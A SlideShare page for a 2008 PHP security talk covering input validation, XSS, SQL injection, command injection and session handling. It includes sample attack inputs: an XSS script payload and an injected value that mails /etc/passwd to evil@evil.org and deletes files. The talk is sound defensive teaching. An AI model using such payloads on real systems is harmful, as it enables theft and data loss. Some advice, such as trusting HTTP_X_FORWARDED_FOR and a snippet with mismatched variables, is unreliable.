Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.

Php security

Presented this on PHPCAMP pune, 2008

  • Sé el primero en comentar

Php security

  1. 1. PHP Security by Uttam KUmar Email:- trickyuk001@gmail.com Mobile:- 8149253187
  2. 2. What is Security? measurement… safety… protection…
  3. 3. Secure Web Applications web security issues have to do with: – hacker attacks • denial of service • server hijacking – common threats – compromise of data
  4. 4. PHP & Security a growing language… a major concern…
  5. 5. Never trust the web… Input data validation – register_globals = OFF – $_REQUEST[] big NO NO … – type casting input data • No isNumeric() if data is numeric [locale problem] • regularExp if data is string – Path validation • Always use basename()
  6. 6. Never trust the web… • Content size validation – use server side max length validation – File Upload • Check destination file size with $_FILES[‘name’][‘size’] • I think Browser MIME header is reliable right ? – Use getImageSize() in case of image • External source upload like Avtar – Make a local copy if path/of/file submitted from a URL.
  7. 7. XSS attack – Can lead to embarrassment. – Session take-over. – Password theft. – User tracking by 3rd parties
  8. 8. XSS attack Prevention is better than cure – Use striptags() • No tag allowance please – Use htmlentities() – Is $_SERVER safe ? • Can be set… • Php.php/%22%3E%3Cscript%3Ealert(‘xss’)%3c/script%3E%3cfoo • $_SERVER[‘PATH_INFO’] = /”><script>alert(‘xss’)</script><foo; • $_SERVER[‘PHP_SELF’] = /php.php/”><script> alert(‘xss’)</script><foo – IP based info • Use HTTP_X_FORWARDED_FOR • Use long2ip() – $aIp = explode(‘,’,$_SERVER[HTTP_X_FORWARDED_FOR]); – $sValidIp = long2ip(ip2long(array_pop($ipss)));
  9. 9. SQL Injection WWW – Arbitrary query execution – Removal of data. – Modification of existing values. – Denial of service. – Arbitrary data injection.
  10. 10. Preventing SQL injection • Are magic quotes enough? – use mysql_real_escape_string() – use prepared statements – avoid omitting single quotes – LIKE quandary need addslashes() – avoid printing query – Authentication data storage • Encrypt sensitive data to access database • Make sure it’s only loaded for certain VirtualHost
  11. 11. Authentication Data Storage SetEnv DB_LOGIN “login” SetEnv DB_PASSWD “password” Set Env DB_HOST “127.0.0.7” <virtualHost iila.ws> include /home/illa/sql.conf </virtualHost> $_SERVER[‘DB_LOGIN’] $_SERVER[‘DB_PASSWD’] /home/illa/sql.conf Apache server configuration PHP file Better Approach is to set these things under php’s ini directives use php_admin_value mysql.default.user. “login”
  12. 12. Preventing code injection – Path validation – Validate fileName $sFile = “D’sozaRes.doc’; basename($sFile); //will return D’sozaRes.doc on *nix system basename($sFile); //will return ’sozaRes.doc on win32 • Remove slashes • Keep white list of file name • Use full path – Avoid variables in eval() – Avoid using variable passed by users for regEx.
  13. 13. Command injection – Use escapeshellcmd() and escapeshellarg() – Use full path for command – Set prority and memory limit for command • shell_exec(“ulimit –t 20 –m 20000; /usr/bin/php test.php”);
  14. 14. Calling External Programs <?php $fp = popen(‘/usr/sbin/sendmail -i ‘. $to , ‘w’); ?> The user could control $to to yield: http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A which would result in running the command: /usr/sbin/sendmail -i evil@evil.org /etc/passwd; rm * a solution would be: $fp = popen(‘/usr/sbin/sendmail -i ‘ . escapeshellarg($to), ‘w’);
  15. 15. Securing sessions • Weakness of session – Server side weakness… • ls –l /tmp/sess_* //can reveal session info – URL session exploitation • Solution – Native protection. – Mixing security and convenience. – Securing session storage path – Check browser signature – Referrer validation
  16. 16. Questions…????
  17. 17. Thank You !!

×